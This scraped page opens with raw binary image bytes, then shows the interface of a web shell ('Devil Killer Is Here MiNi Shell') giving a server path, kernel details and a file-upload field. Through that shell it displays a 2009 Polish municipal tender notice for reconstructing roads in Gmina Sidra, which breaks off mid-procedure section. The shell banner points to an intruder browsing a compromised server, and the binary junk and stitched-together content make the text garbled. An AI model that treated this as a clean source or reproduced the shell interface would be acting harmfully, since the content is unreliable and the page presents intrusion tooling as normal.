JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090218/39233-N-2009.html

<p class="kh_header"><b>Sidra: Przebudowa układu komunikacyjnego gminy Sidra:
-przebudowa drogi powiatowej nr 1249 B Nowy Dwór - Sidra - Makowlany na odcinku o długości 2,400 km w m. Sidra (ulice wsi Sidra: Różanostocka, Rynek, Sokólska),
-przebudowa drogi gminnej nr 103601 B Sidra - Bierwicha - Wólka - Romanówka na 
odcinku o długości 700 m w miejscowości Romanówka,
-przebudowa drogi gminnej nr 103603 B Jałówka - Wólka na odcinku o długości 575 m w miejscowości Jałówka,
-przebudowa drogi gminnej nr 103604 B Chwaszczewo-granica gminy na odcinku o długości 1092,5m</b><br>
<b>Numer ogłoszenia: 39233 - 2009; data zamieszczenia: 18.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sidra , ul. Rynek 5, 16-124 Sidra, woj. podlaskie, tel. 085 7220980, faks 085 7220984.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://epodlasie.wipb.pl/biptest/ug_sidra</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa układu komunikacyjnego gminy Sidra:
-przebudowa drogi powiatowej nr 1249 B Nowy Dwór - Sidra - Makowlany na odcinku o długości 2,400 km w m. Sidra (ulice wsi Sidra: Różanostocka, Rynek, Sokólska),
-przebudowa drogi gminnej nr 103601 B Sidra - Bierwicha - Wólka - Romanówka na 
odcinku o długości 700 m w miejscowości Romanówka,
-przebudowa drogi gminnej nr 103603 B Jałówka - Wólka na odcinku o długości 575 m w miejscowości Jałówka,
-przebudowa drogi gminnej nr 103604 B Chwaszczewo-granica gminy na odcinku o długości 1092,5m.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje:
1.1.  Przebudowa drogi powiatowej nr 1249 B Nowy Dwór - Sidra - Makowlany na odcinku o długości 2,400 km w m. Sidra (ulice wsi Sidra: Różanostocka, Rynek, Sokólska)
 1.1.1. Roboty przygotowawcze
-Roboty pomiarowe przy liniowych robotach ziemnych - 2,4 km;
-Mechaniczne karczowanie zagajników średnich - 0,300 ha;
-Wywóz głazów narzutowych - 52 t;
-Frezowanie nawierzchni bitumicznej gr. 4 cm - 628 m2;
-Rozebranie krawężników betonowych 15 x 30 - 2750 m;
-Rozebranie chodników z płyt betonowych 35 x 35- 3264 m2;
-Rozebranie nawierzchni z płyt betonowych trylinki na wjazdach - 961 m2;
-Rozebranie słupków do znaków drogowych - 22 szt.;
-Rozebranie tarcz znaków drogowych - 22 szt;
-Rozebranie ław, stóp i fundamentów betonowych - 10,6 m3;
-Rozebranie elementów (rur) części przelotowej przepustów śr. 100 cm - 34 m;
-Rozebranie elementów (rur) części przelotowej przepustów śr. 60 cm - 10 m;
1.1.2. Roboty ziemne
-Roboty ziemne poprzeczne na przerzut wykonywane ręcznie - 367 m3;
-Roboty ziemne wykonywane koparkami podsiębiernymi - 1245 m3;
-Plantowanie (obrobienie na czysto) skarb i korony nasypów - 2084 m2;
-Plantowanie (obrobienie na czysto) skarb i dna wykopów wykonywanych mechanicznie - 1801 m2;
1.1.3 Odwodnienie korpusu drogowego
-Roboty ziemne (wykop pod przepusty wykonywane koparkami przedsiębiernymi) - 131 m3;
-Części przelotowe przepustów drogowych z rur polietylenu śr. 100 cm - 42 m;
-Części przelotowe przepustów drogowych z rur polietylenu śr. 60 cm - 12 m;
-Zasypywanie wykopów ze skarpami - 69 m3;
-Odbudowy wlotów ( wylotów) przepustów drogowych rurowych z kamienia brukowca - 52 m2;
-Wykonanie studzienek ściekowych wraz z wpustami ulicznymi - 3 szt.;
1.1.4. Podbudowa
-Koryta gł. 25 cm wykonywane w gruntach - 1734 m2;
-Warstwa dolna podbudowy z kruszyw naturalnych gr. 20 cm - 1734 m2;
-Warstwa górna podbudowy z kruszyw naturalnych gr. śr. 15 cm - 1734 m2;
-Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową grysowo-żwirową mechaniczne - 1837 t.;
-Oczyszczenie warstw konstrukcyjnych ulepszonych mechanicznie - 18376 m2.;
-Skropienie mechaniczne warstwy konstrukcyjnych - 18376 m2;
1.1.5 Nawierzchnia
-Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm - 18376 m2;
1.1.6. Roboty wykończeniowe 
-Regulacja zaworów studzienek wodociągowych - 72 szt.;
-Regulacja zaworów studzienek kanalizacyjnych - 38 szt.;
-Regulacja studzienek telekomunikacyjnych - 14 szt.;
-Plantowanie poboczy wraz z uzupełnieniem i zagęszczeniem - 182 m3;
-Ułożenie rur z polietylenu średnicy 200 mm - 36 m;
1.1.7. Elementy ulic
-Krawężniki betonowe wystające o wymiarach 20 x 30 cm - 3755 m;
-Ułożenie nawierzchni z płyt betonowych 35 x 35 - 6489 m2;
-Ustawienie obrzeży betonowych 20 x 6 - 2673 m;
-Wykonanie ręczne koryta w gr. III kat. na wjazdach - 1056 m2;
-Wykonanie podbudowy z kruszywa naturalnego - 1056 m2;
-Ułożenie nawierzchni z kostki betonowej kolorowej gr. 8 cm - 1444 m2;
1.1.8. Oznakowanie
-Pionowe znaki drogowe - słupki z rur stalowych o średnicy 70 mm - 32 szt.;
-Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. do 0,3 m2 - 24 szt.;
-Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze, informacyjne o pow. ponad 0,3 m2 - 4 szt.;
1.1.9. Zieleń drogowa
-Humusowanie terenów zielonych z obsianiem - 1280 m2;
-Nawierzchnia z kruszywa naturalnego stabilizowanego mechanicznie - 54 m2;
1.2. Przebudowa drogi gminnej nr 103601 B Sidra - Bierwicha - Wólka - Romanówka na odcinku o długości 700 m w miejscowości Romanówka,
1.2.1. Roboty przygotowawcze
-Roboty pomiarowe przy liniowych robotach ziemnych - 0,7 km;
-Mechaniczne karczowanie zagajników krzaków i podszyć średnich - 0,01 ha;
-Wywożenie gałęzi - 30 mp;
-Wywożenie karpiny - 20 mp;
-Dodatek za następny 1 km odległości transportu karpiny, gałęzi - 50 mp
-Rozebranie nawierzchni bitumicznej gr. 4 cm - 58,85 m2 ;
-Rozebranie nawierzchni z brukowca - 18 m2;
-Rozebranie krawężników betonowych 30 x15 - 108 m;
-Rozebranie przepustów rurowych średnicy 50 cm - 9 m.;
-Rozebranie przepustów ramowych - 9 m;
1.2.2. Roboty ziemne
-Wykonanie wykopów mechanicznie w gruncie kat. III-IV - 22,86 m3;
-Plantowanie (obrobienie na czysto) skarb i dna wykopów wykonywanych ręcznie - 159,1 m2;
-Wykonanie nasypów mechanicznie z gruntu kat. III-IV - 117,92 m3;
-Plantowanie (obrobienie na czysto) skarp i korony nasypów - 299,13 m2;
-Zasypanie wykopów wraz z zagęszczeniem - 16,42 m3;
1.2.3. Odwodnienie korpusu drogowego
-Przepusty rurowe pod zjazdami - 1,18 m3;
-Wykonanie przepustów z rur z polietylenu o średnicy 40 cm - 9,8 m;
-Brukowanie skarp, przekopów i nasypów - 15,13 m2;
-Wykonanie koryta mechanicznie wraz z profilowaniem i zagęszczeniem podłoża - 82,73 m2;
-Wykonanie podbudowy z kruszywa naturalnego - 24,5 m2;
-Ręczne oczyszczenie nawierzchni brukowcowej z ziemi i darniny - 700,00 m2;
-Skropienie emulsją asfaltową na zimno podbudowy lub nawierzchni betonowej/bitumicznej - 4282,73 m2;
-Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną - 321,21 t.;
-Warstwa górna podbudowy z kruszyw naturalnych - 4115 m2;
1.2.4. Nawierzchnia
-Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm - 4282,73 m2;	
1.3.Przebudowa drogi gminnej nr 103603 B Jałówka - Wólka na odcinku o długości 575 m w miejscowości Jałówka,
1.3.1. Roboty przygotowawcze
-Roboty pomiarowe przy liniowych robotach ziemnych - 0,956 km;
-Mechaniczne karczowanie zagajników średnich - 0,060 ha;
-Wywóz głazów narzutowych - 240 t;
-Frezowanie nawierzchni bitumicznej gr. 4 cm - 50 m2;
-Rozebranie elementów (rur) części przelotowej przepustów śr. 60 cm - 7 m;
1.3.2. Roboty ziemne
-Roboty ziemne wykopy wykonywane koparkami przedsiębiernymi - 415 m3;
-Roboty ziemne nasypy wykonywane koparkami podsiębiernymi - 188 m3;
-Plantowanie (obrobienie na czysto) skarb i korony nasypów - 265 m2;
-Plantowanie (obrobienie na czysto) skarb i dna wykopów wykonywanych mechanicznie - 58m2;
1.3.3. Odwodnienie korpusu drogowego
-Roboty ziemne (wykop pod przepusty) - 35 m3;
-Części przelotowe przepustów drogowych z rur polietylenu śr. 60 cm - 20 m;
-Zasypywanie wykopów ze skarpami - 25 m3;
-Odbudowy wlotów ( wylotów) przepustów drogowych rurowych z kamienia brukowca - 32 m2;
-Wykonanie studzienek ściekowych wraz z wpustami ulicznymi - 6 szt.;
1.3.4. Podbudowa
-Koryta gł. 25 cm wykonywane w gruntach - 1280 m2;
-Warstwa dolna podbudowy z kruszyw naturalnych gr. 20 cm - 2260 m2;
-Warstwa górna podbudowy z kruszyw naturalnych gr. śr. 15 cm - 2260 m2;
-Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową grysowo-żwirową mechaniczne - 372 t.;
-Oczyszczenie warstw konstrukcyjnych ulepszonych mechanicznie - 6513 m2.;
-Skropienie mechaniczne warstwy konstrukcyjnych - 6513 m2;
1.3.5. Nawierzchnia
-Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm - 6513 m2;
1.3.6. Roboty wykończeniowe 
-Regulacja zaworów studzienek wodociągowych - 32 szt.;
-Plantowanie poboczy wraz z uzupełnieniem i zagęszczeniem - 1637 m2;
-Wykonanie ręczne koryta w gr. III kat. na wjazdach - 1180 m2;
-Wykonanie podbudowy z kruszywa naturalnego gr. 20 cm - 1180 m2;
1.4. Przebudowa drogi gminnej nr 103604 B Chwaszczewo - granica gminy na odcinku o długości 1092,5 m.
1.4.1. Roboty przygotowawcze
-Roboty pomiarowe przy liniowych robotach ziemnych - 1,0925 km;
-Mechaniczne karczowanie krzaków i podszyć gęstych - 0,0005 ha;
-Wywożenie gałęzi - 2,50 mp;
-Wywożenie karpiny - 1,50 mp;
-Dodatek za następny 1 km odległości transportu karpiny, gałęzi - 4,00 mp;
-Mechaniczne usuniecie warstwy ziemi urodzajnej (humusu) - 1662,00 m2;
-Usunięcie kamieni i bloków skalnych - 7,95 m2;
1.4.2. Roboty ziemne
-Wykonanie wykopów mechanicznie w gruncie kat. III-IV - 2 m3;
-Plantowanie (obrobienie na czysto) skarp i dna wykopów wykonywanych ręcznie - 6,23m2;
-Wykonanie nasypów mechanicznie z gruntu kat. III-IV - 489,46 m3;
-Plantowanie (obrobienie na czysto) skarp i korony nasypów - 990,26 m2;
1.4.3. Podbudowy
-Skropienie warstw konstrukcyjnych emulsją asfaltową - 5475,59 m2;
-Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną - 410,67 t.;
-Warstwa górna podbudowy z kruszyw naturalnych gr. 10 cm - 254,00 m3;
1.4.4. Nawierzchnia
-Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm - 5475,59 m2;
1.4.5. Roboty wykończeniowe 
-Umocnienie skarp brukowcem - 11 m2;
-Słupek pod znak A-7 - 1 szt.;
-Przymocowanie do gotowych słupków tarcz znaków drogowych - 1 szt.
-Nawierzchnie żwirowe, warstwa dolna - 287,26 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 50 000,00 PLN (słownie PLN: pięćdziesiąt  tysięcy.)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w Art. 22 ust. 1 i nie podlegają wykluczeniu z postępowania na podstawie Art. 24 ust. 1 i 2 Ustawy.
1.2.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia, w ofercie powinien wykazać (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, spełnienie poniższych warunków Wykonawcy wykazują łącznie):
a)Zakres działalności powinien zapewnić należyte wykonanie zadania.
b)Dysponować pracownikami nadzoru posiadającymi uprawnienia niezbędne do wykonywania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 Prawo budowlane oraz należącymi do właściwej Okręgowej Izby Inżynierów Budownictwa
1.3.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym, a także dysponuje osobami zdolnymi do wykonania niniejszego zamówienia,Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)Dysponować ilością zatrudnionych zapewniającą należyte wykonanie zadania.
b)Dysponować następującymi narzędziami i urządzeniami:
-wytwórnie (otaczarki) o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek mineralno asfaltowych o wydajności nie mniejszej niż 80 ton na godzinę - minimum 1 szt.
-układarki do układania mieszanek mineralno-asfaltowych typu zagęszczonego - minimum 1 szt.,
-walce lekkie, średnie, ciężkie - minimalna ilość przewidziana w technologii wykonania nawierzchni bitumicznych,
-walce ogumione - minimalna ilość przewidziana w technologii wykonania nawierzchni bitumicznych
c)Wskaże do [wykonania ,uczestniczenia w wykonaniu] niniejszego zamówienia następujące [osoby , podmioty], właściwe do realizacji określonych czynności, które posiadają określone kwalifikacje, uwzględniając zapis punktu 8.2 b), niezbędne do wykonania zamówienia:
-kierownik budowy z nie mniej niż trzyletnim doświadczeniem na tym stanowisku, z  
uprawnieniami budowlanymi do kierowania robotami budowlanymi bez ograniczeń w  
specjalności drogowej,
-obsługę geodezyjną - geodeta z uprawnieniami zgodnie z ustawą z dnia 17 maja 1989 (Dz. U.2005 Nr 240 poz. 2027)
d)Wskaże, że w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie zrealizował (zakończył) jako Wykonawca lub Podwykonawca, co najmniej 1 zadanie  lub kilka zadań łącznie w okresie roku kalendarzowego polegające na odbudowie lub przebudowie drogi o wartości nie mniejszej niż 2 400 000 zł.
1.4.W celu potwierdzenia znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa)
-wykonawca osiągnął w pracach budowlanych (drogowych) w ciągu ostatnich 3 lat roczny obrót równy, co najmniej kwocie 3 800 000,00zł,
-posiadać środki finansowe lub zdolność kredytowa, z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości, co najmniej 800 000,00zł,
-posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
1.5.Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: (spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1. Wykonawca winien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w Art. 22 ust. 1 UstawyPrawo Zamówień Publicznych (Dz.U. z 2007r. Nr 223 poz.1655 z późn. zm.). W przypadku składania oferty przez Wykonawców występujących wspólnie, oświadczenie musi być złożone przez każdego Wykonawcę.
1.2.W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie Art. 24 ust. 1 i 2 Ustawy, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich)
1.2.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, który potwierdza prawo Wykonawcy do występowania w obrocie prawnym oraz wskazuje osobę/osoby upoważnione do reprezentacji Wykonawcy. W przypadku, gdy nie wszystkie powyższe informacje znajdują się w dokumencie rejestrowym należy również załączyć inne dokumenty prezentujące powyższe dane np. statut, umowę spółki itp. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonych dokumentów, do oferty należy dołączyć także pełnomocnictwo w formie oryginału lub kopię poświadczoną przez notariusza.
1.2.2. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.2.3.aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8  ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2.4.aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców niżej wymienione dokumenty mogą być złożone wspólnie):
1.3.1.wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
1.3.2.pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,jeżeli w wykazie, o którym mowa w pkt 1.3.1, wykonawca wskazał osoby, którymi będzie dysponował.
1.3.3.wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca, Załącznik nr 4 do niniejszej IDW;
1.3.4.pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 1.3.3, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował; 
1.3.5.dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia;
1.3.6. wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom  budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie 
1.3.7.W przypadku wykazania kontraktów zawartych w walucie innej niż PLN, wartość kontraktu należy przeliczyć na PLN po kursie średnim NBP obowiązującym w dniu podpisania kontraktu (w takim przypadku prosimy o podanie daty podpisania kontraktu).
1.4.W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
1.4.1.sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego  innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres 
1.4.2.informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.4.3. polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności
1.5.Wymagane w punktach 9.1 do 9.4 dokumenty należy przedstawić w formie oryginałów lub kserokopii  poświadczonej za zgodność z oryginałem przez Wykonawcę
1.6.Dodatkowo do oferty należy załączyć:
  a) parafowany formularz umowy - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o  udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia; 
b) parafowany formularz karty gwarancyjnej - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie  ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w   postępowaniu o udzielenie zamówienia;
c)kosztorys ofertowy;
d)pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
